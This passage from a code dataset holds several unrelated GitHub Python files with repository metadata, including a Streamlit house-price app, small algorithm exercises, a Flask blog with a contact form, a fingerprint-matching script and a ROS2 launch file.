self.add_block_list(conv1.get_name(), conv1, conv_output_channel)\n\n layer3 = RouteLayer('-1,-3')\n output_channel = sum([base_out_channels[i] if i >= 0 else\n self.block_out_channels[i] for i in layer3.layers])\n self.add_block_list(layer3.get_name(), layer3, output_channel)\n\n def make_conv_block(self, input_channel, output_channel):\n conv1 = ConvBNActivationBlock(input_channel, output_channel,\n kernel_size=1, stride=1, padding=0,\n bnName=self.bn_name, activationName=self.activation_name)\n self.add_block_list(conv1.get_name(), conv1, output_channel)\n\n temp_input_channel = self.block_out_channels[-1]\n temp_output_channel = output_channel * 2\n conv2 = ConvBNActivationBlock(temp_input_channel, temp_output_channel,\n 
kernel_size=3, stride=1, padding=1,\n bnName=self.bn_name, activationName=self.activation_name)\n self.add_block_list(conv2.get_name(), conv2, temp_output_channel)\n\n temp_input_channel = self.block_out_channels[-1]\n temp_output_channel = output_channel\n conv3 = ConvBNActivationBlock(temp_input_channel, temp_output_channel,\n kernel_size=1, stride=1, padding=0,\n bnName=self.bn_name, activationName=self.activation_name)\n self.add_block_list(conv3.get_name(), conv3, temp_output_channel)\n\n def forward(self, x):\n base_outputs = []\n layer_outputs = []\n output = []\n for key, block in self._modules.items():\n if BlockType.BaseNet in key:\n base_outputs = block(x)\n x = base_outputs[-1]\n elif LayerType.RouteLayer in key:\n x = block(layer_outputs, base_outputs)\n elif LayerType.ShortcutLayer in key:\n x = block(layer_outputs)\n elif LossType.YoloLoss in key:\n output.append(x)\n elif LossType.CrossEntropy2d in key:\n output.append(x)\n else:\n x = block(x)\n layer_outputs.append(x)\n return output\n","repo_name":"lpj0822/image_point_cloud_det","sub_path":"easyai/model/seg/mobilev2_fcn_seg.py","file_name":"mobilev2_fcn_seg.py","file_ext":"py","file_size_in_byte":6149,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"74358338511","text":"import streamlit as st\r\nimport pandas as pd\r\nimport shap\r\nfrom PIL import Image\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn import datasets\r\nfrom sklearn.ensemble import RandomForestRegressor\r\nimage = Image.open('logo.png')\r\ncola, colb, colc = st.columns([3,6,1])\r\nwith cola:\r\n st.write(\"\")\r\n\r\nwith colb:\r\n st.image(image, width = 300)\r\n\r\nwith colc:\r\n st.write(\"\")\r\nmenu = [\"Home\",\"About\"]\r\nchoice = st.sidebar.selectbox(\"Menu\",menu)\r\nif choice == \"Home\":\r\n st.write(\"\"\"\r\n # Boston House Price Prediction App\r\n\r\n This app predicts the **Boston House Price**!\r\n \"\"\")\r\n st.write('---')\r\n\r\n # Loads the Boston House Price Dataset\r\n boston = datasets.load_boston()\r\n X = pd.DataFrame(boston.data, columns=boston.feature_names)\r\n Y = pd.DataFrame(boston.target, columns=[\"MEDV\"])\r\n st.write(\"\"\"\r\n **THE DATASET DATA** \\n\r\n Data description \\n\r\n The Boston data frame has 506 rows and 14 columns.This data frame contains the following columns:\\n\r\n crim: per capita crime rate by town,\\n\r\n zn: proportion of residential land zoned for lots over 25,000 sq.ft,\\n\r\n indus: proportion of non-retail business acres per town,\\n\r\n chas: Charles River dummy variable (= 1 if tract bounds river; 0 otherwise),\\n\r\n nox: nitrogen oxides concentration (parts per 10 million),\\n\r\n rm: average number of rooms per dwelling,\\n\r\n age: proportion of owner-occupied units built prior to 1940,\\n\r\n dis: weighted mean of distances to five Boston employment centres,\\n\r\n rad: index of accessibility to radial highways,\\n\r\n tax: full-value property-tax rate per \\$10,000,\\n\r\n ptratio: pupil-teacher ratio by town,\\n\r\n black: 1000(Bk - 0.63)^2 where Bk is the proportion of blacks by town,\\n\r\n lstat: lower status of the population (percent).\\n\r\n \"\"\")\r\n st.write(X)\r\n st.write(\"\"\"\r\n **THE DATASET LABELS**\r\n medv:median value of owner-occupied homes in \\$1000s.\r\n \"\"\")\r\n st.write(Y)\r\n # Sidebar\r\n # Header of Specify Input Parameters\r\n st.sidebar.header('Specify Input Parameters')\r\n\r\n def user_input_features():\r\n CRIM = st.sidebar.slider('CRIM', float(X.CRIM.min()), float(X.CRIM.max()), 
float(X.CRIM.mean()))\r\n ZN = st.sidebar.slider('ZN', float(X.ZN.min()), float(X.ZN.max()), float(X.ZN.mean()))\r\n INDUS = st.sidebar.slider('INDUS', float(X.INDUS.min()), float(X.INDUS.max()), float(X.INDUS.mean()))\r\n CHAS = st.sidebar.slider('CHAS', float(X.CHAS.min()), float(X.CHAS.max()), float(X.CHAS.mean()))\r\n NOX = st.sidebar.slider('NOX', float(X.NOX.min()), float(X.NOX.max()), float(X.NOX.mean()))\r\n RM = st.sidebar.slider('RM', float(X.RM.min()), float(X.RM.max()), float(X.RM.mean()))\r\n AGE = st.sidebar.slider('AGE', float(X.AGE.min()), float(X.AGE.max()), float(X.AGE.mean()))\r\n DIS = st.sidebar.slider('DIS', float(X.DIS.min()), float(X.DIS.max()), float(X.DIS.mean()))\r\n RAD = st.sidebar.slider('RAD', float(X.RAD.min()), float(X.RAD.max()), float(X.RAD.mean()))\r\n TAX = st.sidebar.slider('TAX', float(X.TAX.min()), float(X.TAX.max()), float(X.TAX.mean()))\r\n PTRATIO = st.sidebar.slider('PTRATIO', float(X.PTRATIO.min()), float(X.PTRATIO.max()), float(X.PTRATIO.mean()))\r\n B = st.sidebar.slider('B', float(X.B.min()), float(X.B.max()), float(X.B.mean()))\r\n LSTAT = st.sidebar.slider('LSTAT', float(X.LSTAT.min()), float(X.LSTAT.max()), float(X.LSTAT.mean()))\r\n data = {'CRIM': CRIM,\r\n 'ZN': ZN,\r\n 'INDUS': INDUS,\r\n 'CHAS': CHAS,\r\n 'NOX': NOX,\r\n 'RM': RM,\r\n 'AGE': AGE,\r\n 'DIS': DIS,\r\n 'RAD': RAD,\r\n 'TAX': TAX,\r\n 'PTRATIO': PTRATIO,\r\n 'B': B,\r\n 'LSTAT': LSTAT}\r\n features = pd.DataFrame(data, index=[0])\r\n return features\r\n\r\n df = user_input_features()\r\n\r\n # Main Panel\r\n\r\n # Print specified input parameters\r\n st.header('Specified Input parameters')\r\n st.write(df)\r\n st.write('---')\r\n\r\n # Build Regression Model\r\n model = RandomForestRegressor()\r\n model.fit(X, Y)\r\n # Apply Model to Make Prediction\r\n prediction = model.predict(df)\r\n\r\n st.header('Prediction of MEDV')\r\n st.write(prediction)\r\n st.write('---')\r\n\r\n # Explaining the model's predictions using SHAP values\r\n # https://github.com/slundberg/shap\r\n explainer = shap.TreeExplainer(model)\r\n shap_values = explainer.shap_values(X)\r\n\r\n st.header('Feature Importance')\r\n f, ax = plt.subplots()\r\n ax.set_title('Feature importance based on SHAP values')\r\n shap.summary_plot(shap_values, X)\r\n st.pyplot(f,bbox_inches='tight')\r\n st.write('---')\r\n\r\n f, ax = plt.subplots()\r\n ax.set_title('Feature importance based on SHAP values (Bar)')\r\n shap.summary_plot(shap_values, X, plot_type=\"bar\")\r\n st.pyplot(f,bbox_inches='tight')\r\nelse:\r\n st.subheader(\"About\")\r\n st.write(\"With a hybrid profile of data science and computer science, I’m pursuing a career in AI-driven firms. 
I believe in dedication, discipline, and creativity towards my job, which will be helpful in meeting your firm's requirements as well as my personal development.\")\r\n st.write(\"Check out this project's [Github](https://github.com/bashirsadat/boston-house-ml-app)\")\r\n st.write(\" My [Linkedin](https://www.linkedin.com/in/saadaat/)\")\r\n st.write(\"See my other projects [LinkTree](https://linktr.ee/saadaat)\")\r\n","repo_name":"bashirsadat/boston-house-ml-app","sub_path":"boston-house-ml-app.py","file_name":"boston-house-ml-app.py","file_ext":"py","file_size_in_byte":5518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"19125533671","text":"def med_of_two_sorted(x,y):\n\n l=x+y\n n= len(l)\n\n if n % 2 == 0:\n med1 = l[n//2]\n med2 = l[n//2 - 1]\n median = (med1+med2)/2\n else:\n median = l[n//2]\n\n return (\"the median of the given arrays is {}\".format(median))\n\n\nx = list(map(int, input().rstrip().split()))\ny = list(map(int, input().rstrip().split()))\nprint(med_of_two_sorted(x,y))\n","repo_name":"Dharanidharan2001/cse","sub_path":"python/median_of_two_sorted_array.py","file_name":"median_of_two_sorted_array.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"24972539110","text":"\n\nfrom collections import deque\n\n\ndx , dy = [-1,1,0,0],[0,0,-1,1]\n\ndef saveBomb():\n for i in range(r):\n for j in range(c):\n if map[i][j]!='.':\n bombList.append((i,j)) #폭탄 좌표 저장\n\n\ndef insertBomb():\n for i in range(r):\n for j in range(c):\n if map[i][j]!='0':\n map[i][j]='0'\n\n\ndef bomb():\n while bombList:\n x,y =bombList.popleft()\n map[x][y]='.'\n for i in range(4): #앞뒤양옆 폭탄 터짐\n nx, ny= x+dx[i], y+dy[i]\n if 0<=nx< r and 0 <= ny0 : \n saveBomb()\n insertBomb()\n time-=1 #1초동안 폭탄 설치\n if time==0:\n break\n bomb()\n time-=1 #3초전 설치된 폭탄이 모두 폭발\n\n printMap()","repo_name":"YAPP-Github/20th-Study-Algorithm-2","sub_path":"src/seonyoung/3week/봄버맨.py","file_name":"봄버맨.py","file_ext":"py","file_size_in_byte":1180,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"83"} +{"seq_id":"26571343377","text":"def check_valid_input(letter_guessed,old_letters_guessed):\n if(len(a)>1):\n if(not a.isalnum()):\n return \"X\";\n else:\n old_letters_guessed+=a;\n else:\n if(not a.isalnum()):\n old_letters_guessed+=a;\n else:\n return True; \n\ndef print_welcome_prompt():\n HANGMAN_ASCII_ART = ''' _ _ \n | | | | \n | |__| | __ _ _ __ __ _ _ __ ___ __ _ _ __ \n | __ |/ _` | '_ \\ / _` | '_ ` _ \\ / _` | '_ \\ \n | | | | (_| | | | | (_| | | | | | | (_| | | | |\n |_| |_|\\__,_|_| |_|\\__, |_| |_| |_|\\__,_|_| |_|\n __/ | \n |___/ '''\n\nprint(HANGMAN_ASCII_ART)\nMAX_TRIES = 6\nprint(\"You have\",MAX_TRIES,\"tries\")\n\n\n# word = input(\"Please insert a word: \")\n# print(word)\n# print(\"_ _ _ _ _ _\")\na = input(\"Guess a letter: \")\nprint(is_valid_input(a))\n","repo_name":"KobiShashs/Python","sub_path":"11_Hangman/7_main.py","file_name":"7_main.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"22449224960","text":"from typing import Callable\nimport numpy as np\nVSML = 1e-8\n\n\ndef get_logistic_func(alpha: float) -> Callable[[float], float]:\n return lambda x: 1. / (1 + np.exp(-alpha * x))\n\n\ndef get_unit_sigmoid_func(alpha: float) -> Callable[[float], float]:\n return lambda x: 1. 
/ (1 + (1 / np.where(x == 0, VSML, x) - 1) ** alpha)\n\n\nif __name__ == '__main__':\n from rl.gen_utils.plot_funcs import plot_list_of_curves\n alpha = [2.0, 1.0, 0.5]\n colors = [\"r-\", \"b--\", \"g-.\"]\n labels = [(r\"$\\alpha$ = %.1f\" % a) for a in alpha]\n logistics = [get_logistic_func(a) for a in alpha]\n x_vals = np.arange(-3.0, 3.01, 0.05)\n y_vals = [f(x_vals) for f in logistics]\n plot_list_of_curves(\n [x_vals] * len(logistics),\n y_vals,\n colors,\n labels,\n title=\"Logistic Functions\"\n )\n\n alpha = [2.0, 1.0, 0.5]\n colors = [\"r-\", \"b--\", \"g-.\"]\n labels = [(r\"$\\alpha$ = %.1f\" % a) for a in alpha]\n unit_sigmoids = [get_unit_sigmoid_func(a) for a in alpha]\n x_vals = np.arange(0.0, 1.01, 0.01)\n y_vals = [f(x_vals) for f in unit_sigmoids]\n plot_list_of_curves(\n [x_vals] * len(logistics),\n y_vals,\n colors,\n labels,\n title=\"Unit-Sigmoid Functions\"\n )\n","repo_name":"TikhonJelvis/RL-book","sub_path":"rl/gen_utils/common_funcs.py","file_name":"common_funcs.py","file_ext":"py","file_size_in_byte":1240,"program_lang":"python","lang":"en","doc_type":"code","stars":410,"dataset":"github-code","pt":"83"} +{"seq_id":"12912556260","text":"#\n# @lc app=leetcode id=1786 lang=python3\n#\n# [1786] Number of Restricted Paths From First to Last Node\n#\n\n# @lc code=start\nfrom collections import deque\nimport heapq\nfrom typing import List\n\n\nclass Solution:\n '''\n First build the graph\n Dijkstra from n to every point, record the distanceToLastNode(x) in an array\n Then we calculate number of paths starting from node 0 and reaching each node [i]\n '''\n def Dijkstra(self, graph, source):\n n = len(graph)\n result = [-1] * n\n heap = []\n visited = [False]*n\n visitedCount = 0\n heapq.heappush(heap, [0, source])\n\n while heap and visitedCount < n:\n weight, node = heapq.heappop(heap)\n if result[node] < 0:\n result[node] = weight\n visited[node] = True\n visitedCount += 1\n for nxt in graph[node].keys():\n heapq.heappush(heap, [weight + graph[node][nxt], nxt]) \n return result\n \n def countRestrictedPaths(self, n: int, edges: List[List[int]]) -> int:\n MOD = pow(10, 9) + 7\n\n graph = [{} for i in range(n)]\n for a, b, w in edges:\n graph[a - 1][b - 1] = w\n graph[b - 1][a - 1] = w\n \n distanceToLastNode = self.Dijkstra(graph, n - 1)\n distanceToLastNodeSorted = sorted(list(enumerate(distanceToLastNode)), key = lambda x: - x[1])\n result = [0] * n\n result[0] = 1\n i = 0\n while distanceToLastNodeSorted[i][0] != 0:\n i += 1\n \n for j in range(i, n):\n for nxt in graph[distanceToLastNodeSorted[j][0]]:\n if distanceToLastNode[nxt] < distanceToLastNodeSorted[j][1]:\n result[nxt] += result[distanceToLastNodeSorted[j][0]]\n result[nxt] %= MOD\n return result[-1]\n# @lc code=end\n\n","repo_name":"huikinglam02gmail/Leetcode_solutions","sub_path":"1786.number-of-restricted-paths-from-first-to-last-node.py","file_name":"1786.number-of-restricted-paths-from-first-to-last-node.py","file_ext":"py","file_size_in_byte":1886,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"14969680035","text":"from django.urls.conf import include, path\nfrom rest_framework.routers import DefaultRouter\n\nfrom personal.views import (CountyViewSet, DistrictViewSet, ProfileViewSet,\n SchoolViewSet)\n\nrouter = DefaultRouter()\nrouter.register(r'counties', CountyViewSet)\nrouter.register(r'districts', DistrictViewSet)\nrouter.register(r'schools', SchoolViewSet)\nrouter.register(r'profiles', ProfileViewSet)\n\napp_name = 
\"profile\"\n\nurlpatterns = [\n path('', include(router.urls)),\n]\n","repo_name":"ZdruzenieSTROM/webstrom-backend","sub_path":"personal/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"83"} +{"seq_id":"44801389984","text":"#!/usr/bin/env python\r\n\r\n\"\"\"naive_with_counts.py: naive exact matching with the number of character comparisons performed and the number of alignments tried.\"\"\"\r\n\r\n__author__ = \"Ahmad Ammari\"\r\n\r\ndef readGenome(filename):\r\n genome = ''\r\n with open(filename, 'r') as f:\r\n for line in f:\r\n # ignore header line with genome information\r\n if not line[0] == '>':\r\n genome += line.rstrip()\r\n return genome\r\n\t\r\n\t\r\ndef naive_with_counts(p, t):\r\n occurrences = []\r\n num_alignments = len(t) - len(p) + 1\r\n num_character_comparisons = 0\r\n for i in range(len(t) - len(p) + 1):\r\n match = True\r\n for j in range(len(p)):\r\n num_character_comparisons += 1\r\n if t[i+j] != p[j]:\r\n match = False\r\n break\r\n if match:\r\n occurrences.append(i)\r\n return (occurrences, num_alignments, num_character_comparisons)\r\n\t\r\n\r\n","repo_name":"anammari/AlgorithmsForDNASequencing","sub_path":"assignments/week2/naive_with_counts.py","file_name":"naive_with_counts.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"34008415892","text":"from flask_app.config.mysqlconnection import connectToMySQL\r\nfrom flask import flash\r\nclass Company():\r\n\r\n def __init__(self,data):\r\n self.id = data['id']\r\n self.name = data['name']\r\n self.rank = data['rank']\r\n self.location =data['location']\r\n self.marketCapitalization =data['marketCapitalization'] \r\n self.news = data['news']\r\n self.create_at =data['create_at']\r\n self.update_at =data['update_at']\r\n\r\n @classmethod\r\n def save(cls, data):\r\n query = \"INSERT INTO companies (`rank`, marketCapitalization, `location`, news, `name`) VALUES ( %(server_rank)s,%(server_marketCapitalization)s,%(server_location)s,%(server_news)s, %(server_name)s);\"\r\n result = connectToMySQL(\"company_schema\").query_db(query,data)\r\n return result\r\n \r\n\r\n @classmethod\r\n def get_all_companies(cls):\r\n query = 'SELECT * FROM companies;'\r\n results = connectToMySQL('company_schema').query_db(query)\r\n companies = []\r\n for each_result in results:\r\n companies.append( Company(each_result) )\r\n return companies\r\n\r\n @classmethod\r\n def get_one_company(cls,data):\r\n query = 'SELECT * FROM companies WHERE id =%(server_id)s'\r\n results = connectToMySQL('company_schema').query_db(query, data)\r\n return Company(results[0])\r\n\r\n @classmethod\r\n def update_company(cls,data):\r\n query = 'UPDATE companies SET `name` = %(server_name)s, `rank` = %(server_rank)s, `location` = %(server_location)s, marketCapitalization = %(server_marketCapitalization)s,news = %(server_news)s WHERE id = %(server_id)s;'\r\n return connectToMySQL('company_schema').query_db( query, data)\r\n\r\n @classmethod\r\n def delete(cls, data):\r\n query = 'DELETE FROM companies WHERE id = %(server_id)s;'\r\n return connectToMySQL('company_schema').query_db( query, data)\r\n\r\n @staticmethod\r\n def validate_new_company(data):\r\n is_valid = True\r\n if data['template_name'] == \"\":\r\n is_valid = False\r\n flash(\"Name should be filled\")\r\n if data['template_rank'] == \"\":\r\n is_valid = False\r\n flash(\"Rank 
should be filled")\r\n else:\r\n if int(data['template_rank'])<= 0:\r\n is_valid = False\r\n flash("Rank should be a number greater than 0")\r\n if data['template_location'] == "":\r\n is_valid = False\r\n flash("Location should be filled")\r\n if data['template_marketCapitalization'] == "":\r\n is_valid = False\r\n flash("Market Capitalization should be filled")\r\n else:\r\n if int(data['template_marketCapitalization'])<= 0:\r\n is_valid = False\r\n flash("Market Capitalization should be a number greater than 0")\r\n if data['template_news'] == "":\r\n is_valid = False\r\n flash("News should be filled")\r\n return is_valid\r\n\r\n\r\n","repo_name":"alexschmidt123/company_list","sub_path":"flask_app/models/company.py","file_name":"company.py","file_ext":"py","file_size_in_byte":2990,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} {"seq_id":"35263578039","text":"#!/usr/bin/env python3\n"""\nExample module with functions to read, write and parse files.\n\nSimple tests are included in docstrings and run using doctest.\n\nFurther tests are implemented in a separate file using pytest\n(tests/unit_tests/test_file_io.py) to avoid adding test-specific code to\ndocstrings.\n"""\n\nimport gzip\nimport json\nimport pathlib\nimport yaml\n\n\ndef read_file(filename):\n r"""\n Read a file, automatically detect gzipped files based on suffix.\n\n >>> read_file('tests/files/infile')\n 'testfile content\\n'\n >>> read_file('nofile')\n ''\n """\n if '.gz' in pathlib.Path(filename).suffixes:\n try:\n with gzip.open(filename, 'rt') as fh:\n return fh.read()\n except OSError:\n return ''\n try:\n with open(filename, 'r') as fh:\n return fh.read()\n except IOError:\n return ''\n\n\ndef load_yaml(filename):\n """\n Parse a JSON/YAML file.\n\n load_yaml('identifiers.yaml')\n """\n data = read_file(filename)\n identifiers = yaml.safe_load(data)\n return identifiers\n\n\ndef write_file(filename, data):\n """\n Write a file, use suffix to determine type and compression.\n\n - types: '.json', '.yaml'\n - compression: None, '.gz'\n\n write_file('variable.json.gz')\n """\n if '.json' in filename:\n content = json.dumps(data, indent=1)\n elif '.yaml' in filename:\n content = yaml.dump(data, indent=1)\n else:\n content = data\n if '.gz' in filename:\n try:\n with gzip.open(filename, 'wt') as fh:\n fh.write(content)\n except OSError:\n return False\n else:\n try:\n with open(filename, 'wt') as fh:\n fh.write(content)\n except IOError:\n return False\n return True\n\n\nif __name__ == '__main__':\n import doctest\n doctest.testmod()\n","repo_name":"rjchallis/test","sub_path":"lib/file_io.py","file_name":"file_io.py","file_ext":"py","file_size_in_byte":1873,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} {"seq_id":"40557024523","text":"# blogCapstone.py\n#\n# Python Bootcamp Day 59 - Flask Blog Capstone\n# Usage:\n# A more robust blog using Flask and JSON data. 
Day 59 Python Bootcamp.\n#\n# Marceia Egler January 5, 2022\n\nimport json\nfrom flask import Flask, render_template, request\nimport requests\nfrom mailjet_rest import Client\nimport os\nfrom dotenv import dotenv_values\n\nconfig = dotenv_values(".env")\n\nmailjet = Client(\n auth=(config["api_key"], config["api_secret"]), version="v3.1"\n)\napp = Flask(__name__)\n\n\n@app.route("/")\ndef home():\n data_endpoint = "https://api.npoint.io/518f1f99a0306ee5ceea"\n r = requests.get(data_endpoint)\n all_posts = r.json()\n return render_template("index.html", blog_posts=all_posts)\n\n\n@app.route("/about")\ndef about():\n return render_template("about.html")\n\n\n@app.route("/contact")\ndef contact():\n return render_template("contact.html")\n\n\n@app.route("/formSubmit", methods=["POST"])\ndef formSubmit():\n if request.method == "POST":\n name = request.form["name"]\n email = request.form["email"]\n message = request.form["message"]\n data = {\n "Messages": [\n {\n "From": {"Email": email, "Name": name},\n "To": [\n {\n "Email": "YOUR-EMAIL-ADDRESS@EMAIL.COM",\n "Name": "YOUR NAME",\n }\n ],\n "Subject": "Contact Form Submission",\n "TextPart": message,\n "HTMLPart": f"<p>{message}</p>
\",\n \"CustomID\": \"AppGettingStartedTest\",\n }\n ]\n }\n result = mailjet.send.create(data=data)\n print(result.status_code)\n return render_template(\"contact.html\")\n\n\n@app.route(\"/post/\")\ndef blog(id):\n data_endpoint = \"https://api.npoint.io/518f1f99a0306ee5ceea\"\n r = requests.get(data_endpoint)\n all_posts = r.json()\n id = int(id) - 1\n title = all_posts[id][\"title\"]\n body = all_posts[id][\"body\"]\n subtitle = all_posts[id][\"subtitle\"]\n return render_template(\n \"post.html\", title=title, body=body, subtitle=subtitle\n )\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n","repo_name":"megler/Day59-Blog-Capstone","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"11085209745","text":"# (C) Datadog, Inc. 2023-present\n# All rights reserved\n# Licensed under a 3-clause BSD style license (see LICENSE)\n\nimport pytest\n\nfrom datadog_checks.weaviate import WeaviateCheck\n\nfrom .common import MOCKED_INSTANCE, get_fixture_path\n\npytestmark = pytest.mark.integration\n\n\ndef test_check_mock_weaviate_metadata(datadog_agent, mock_http_response):\n mock_http_response(file_path=get_fixture_path('weaviate_meta_api.json'))\n check = WeaviateCheck('weaviate', {}, [MOCKED_INSTANCE])\n check.check_id = 'test:123'\n check._submit_version_metadata()\n raw_version = '1.19.1'\n\n major, minor, patch = raw_version.split('.')\n version_metadata = {\n 'version.scheme': 'semver',\n 'version.major': major,\n 'version.minor': minor,\n 'version.patch': patch,\n 'version.raw': raw_version,\n }\n\n datadog_agent.assert_metadata('test:123', version_metadata)\n","repo_name":"DataDog/integrations-core","sub_path":"weaviate/tests/test_integration.py","file_name":"test_integration.py","file_ext":"py","file_size_in_byte":898,"program_lang":"python","lang":"en","doc_type":"code","stars":820,"dataset":"github-code","pt":"83"} +{"seq_id":"20632893926","text":"#matplotlib\nimport matplotlib.pyplot as plt\n#skimage\nimport skimage as io \nfrom skimage import color,data\nfrom skimage.filters import threshold_otsu\nfrom skimage.filters import gaussian\n#numpy\nimport numpy as np\n#PIL\nfrom PIL import Image\n\n#Funcion para ver dos imagenes\ndef plot_comparison(original, filtered, title):\n fig, (ax1, ax2) = plt.subplots(ncols=2, figsize=(8,6), sharex=True, sharey=True)\n ax1.imshow(original, cmap = plt.cm.gray)\n ax1.set_title(\"Original\")\n ax1.axis(\"off\")\n ax2.imshow(filtered, cmap = plt.cm.gray)\n ax2.set_title(title)\n ax2.axis(\"off\")\n\n#Extraer una mano\ndef extractHand(carpeta):\n #arreglo para la mano\n handy = [0,0,0,0,0]\n\n for x in range(0,5):\n #Leer imagen \n matrixFinger = plt.imread(\"./Images/sub\"+str(carpeta)+\"/\"+str(carpeta)+str(x+1)+\".jpg\")\n #Suavizar\n #gaussianFinger = gaussian(matrixFinger, multichannel= False)\n #Convertir a gris\n grayFinger = color.rgb2gray(matrixFinger)\n #Convertir matriz a arreglo\n fingerInVector = np.concatenate(grayFinger)\n fingerInList = fingerInVector.tolist()\n handy[x] = fingerInList\n #Convertir la mano en una matriz\n handyInMatrix = np.array(handy)\n #transponemos la matriz de la mano para que los dedos esten en las columnas\n transposeHandy = np.transpose(handyInMatrix)\n #haciendo el SVD\n u,s,vh = np.linalg.svd(transposeHandy, full_matrices = False)\n #transponemos la matriz U para sacar la columna\n transposeU = np.transpose(u)\n #devolver matriz U \n return transposeU[0] \n 
\n#Base de datos\ndataBase = []\n\n#Extraer todas las manos y guardarlas en nuestro arreglo dataBase\nfor i in range(1,51):\n dataBase.append(extractHand(i))\n\n#rint(dataBase[0])\n\nhandy = [0,0,0,0,0]\n\nfor x in range(0,5):\n #Leer imagen \n matrixFinger = plt.imread(\"./Images/newFile/\"+str(x+1)+\".jpg\")\n #Suavizar\n #gaussianFinger = gaussian(matrixFinger, multichannel= False)\n #Convertir a gris\n grayFinger = color.rgb2gray(matrixFinger)\n #Convertir matriz a arregloss\n fingerInVector = np.concatenate(grayFinger)\n fingerInList = fingerInVector.tolist()\n handy[x] = fingerInList\n#Convertir la mano en una matriz\nhandyInMatrix = np.array(handy)\ntransposeHandy = np.transpose(handyInMatrix) \n\n#sacar los residuos \nresiduos = []\nfor i in range(0,50):\n #usamos la funcion lstsq para obtener el residuo vectorial \n x, residual,rank,singular = np.linalg.lstsq(transposeHandy,dataBase[i],-1)\n #pasamos los residuos en formato lista\n residualList = residual.tolist()\n #metemos los residuos en un array para buscar al sujeto \n residuos.append(residualList)\n\n#El sujeto sera aquel cuya posicion en el arreglo tenga el numero\nsujeto = np.amin(residuos)\n\nprint(0.000000000000000000000001)\nif (sujeto > 0.000000000000000000001):\n print(\"El sujeto no se encuentra en la base de datos\")\n exit()\n\nprint(sujeto)\n\n#Buscando al sujeto \nfor i in range(0,50):\n if (sujeto == residuos[i]):\n print(\"La mano pertenece al sujeto \"+str(i+1))\n break\n\n\n\n#lstsq\n\n\n","repo_name":"AndresGiron/EscanerDactilar","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3088,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"43328184587","text":"import launch\nimport launch.actions\nfrom launch.substitutions import LaunchConfiguration, PathJoinSubstitution\nfrom launch_ros.actions import Node\nimport os\nfrom ament_index_python.packages import get_package_share_directory\nimport subprocess\n\n\ndef generate_launch_description():\n pkg_ur_bringup = get_package_share_directory('ur_bringup')\n pkg_ur10e_moveit2_controller = get_package_share_directory('ur10e_moveit2_controller')\n pkg_zed = get_package_share_directory('zed_wrapper')\n pkg_pcd_demo = get_package_share_directory('pcd_demo')\n\n moveit_launch = PathJoinSubstitution([pkg_ur_bringup, 'launch', 'ur_control.launch.py'])\n rviz_launch = PathJoinSubstitution([pkg_ur_bringup, 'launch', 'ur_moveit.launch.py'])\n ur10e_moveit2_controller_launch = PathJoinSubstitution([pkg_ur10e_moveit2_controller, 'launch', 'controller.launch.py'])\n pcd_to_ply_launch = PathJoinSubstitution([pkg_pcd_demo, 'launch', 'pcd_to_ply_pause.launch.py'])\n zed_launch = PathJoinSubstitution([pkg_zed, 'launch', 'zed2.launch.py'])\n\n tf_static = Node(package='tf2_ros',\n executable='static_transform_publisher',\n arguments=['0.0', '0.0', '0.0', '2.36', '-1.57', '0.0', 'tool0', 'camera_mount'])\n\n moveit = launch.actions.IncludeLaunchDescription(\n launch.launch_description_sources.PythonLaunchDescriptionSource([moveit_launch]),\n launch_arguments={'ur_type': 'ur10e',\n 'robot_ip': '192.168.2.5',\n 'use_fake_hardware': 'false',\n 'launch_rviz': 'false',\n 'initial_joint_controller': 'joint_trajectory_controller'}.items()\n )\n\n rviz = launch.actions.IncludeLaunchDescription(\n launch.launch_description_sources.PythonLaunchDescriptionSource([rviz_launch]),\n launch_arguments={'ur_type': 'ur10e',\n 'robot_ip': '192.168.2.5',\n 'use_fake_hardware': 'false',\n 'launch_rviz': 
'true'}.items()\n )\n\n controller = launch.actions.IncludeLaunchDescription(\n launch.launch_description_sources.PythonLaunchDescriptionSource([ur10e_moveit2_controller_launch]),\n launch_arguments=[]\n )\n\n pcd_to_ply = launch.actions.IncludeLaunchDescription(\n launch.launch_description_sources.PythonLaunchDescriptionSource([pcd_to_ply_launch]),\n launch_arguments=[]\n )\n\n zed = launch.actions.IncludeLaunchDescription(\n launch.launch_description_sources.PythonLaunchDescriptionSource([zed_launch]),\n launch_arguments={'publish_tf': 'false',\n 'publish_map_tf': 'false',\n 'base_frame': 'camera_mount'}.items()\n )\n\n ld = launch.LaunchDescription()\n ld.add_action(moveit)\n ld.add_action(rviz)\n ld.add_action(tf_static)\n ld.add_action(zed)\n ld.add_action(pcd_to_ply)\n\n return ld\n","repo_name":"FlorianPix/ur10e_moveit2_controller","sub_path":"launch/bringup_real_ur10e.launch.py","file_name":"bringup_real_ur10e.launch.py","file_ext":"py","file_size_in_byte":2934,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"27213496939","text":"from __future__ import print_function\n\nimport os\nimport subprocess\n\nfrom setuptools import setup\nfrom setuptools.command.develop import develop\nfrom setuptools.command.install import install\nfrom nmosauth.auth_server.constants 